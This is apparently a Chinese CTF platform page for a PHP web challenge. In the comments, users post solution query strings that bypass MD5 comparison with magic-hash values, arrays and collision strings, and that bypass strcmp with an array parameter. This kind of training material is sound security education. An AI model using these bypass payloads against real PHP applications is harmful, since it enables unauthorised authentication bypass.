前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 5698
提  示:
描  述:
来源 山科大ctf
评论
Bruce20231767 1月前

http://117.72.52.127:19244/?v1=QNKCDZO&v2=240610708&v3[]=3 v1与v2值不相等但是MD5值相等,当然也可以使用数组因为MD5漏洞是无法识别数组 v3使用数组是因为,strcmp函数理应产生警告但是由于php版本问题被忽略,结果返回的是false(这里等价与$v3与$flag值相等),然后 !false ,成功绕过

回复 0

shuiwang 1月前

你为什么要我解这个

回复 1

lwgzs 1月前

查看源码,弱类型比较

回复 0

ctfer-pls 2月前

md5值绕过

回复 0

2686213396 2月前

hash碰撞+strcmp绕过

回复 0

iNMB 2月前

?v1=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&v2=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&v3[]=test

回复 1

ahco 2月前

v1[]=123&v2[]=234&v3=flag{*******}

回复 0

zhuizhui 2月前

md5绕过和strcmp漏洞 strcmp漏洞:一个数组一个字符串也返回0

回复 0

xlogsrc 3月前

?v1[]=a&v2[]=b&v3[]=c

回复 0

lordinglord 4月前

http://117.72.52.127:19197/index.php?v1=QNKCDZO&v2=240610708&v3[]=a

回复 0

WriteUp

image
harry

3 金币

评分(12)

解题动态

Julia 攻破了该题 1小时前
没有伞的小白帽 攻破了该题 3小时前
17361232956 攻破了该题 5小时前
楼主甜甜圈 攻破了该题 7小时前
hahahahahahaha 攻破了该题 7小时前
orange2015 攻破了该题 1天前
hanzkj 攻破了该题 1天前
xiemeimei 攻破了该题 1天前
malx 攻破了该题 1天前
desireart 攻破了该题 1天前
2757547892 攻破了该题 2天前
要加两个蛋 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
欲语泪先流 攻破了该题 3天前
吴王饭差 攻破了该题 3天前
1234567nxb 攻破了该题 3天前
kzlkzl 攻破了该题 3天前
huangyujie 攻破了该题 4天前
问题反馈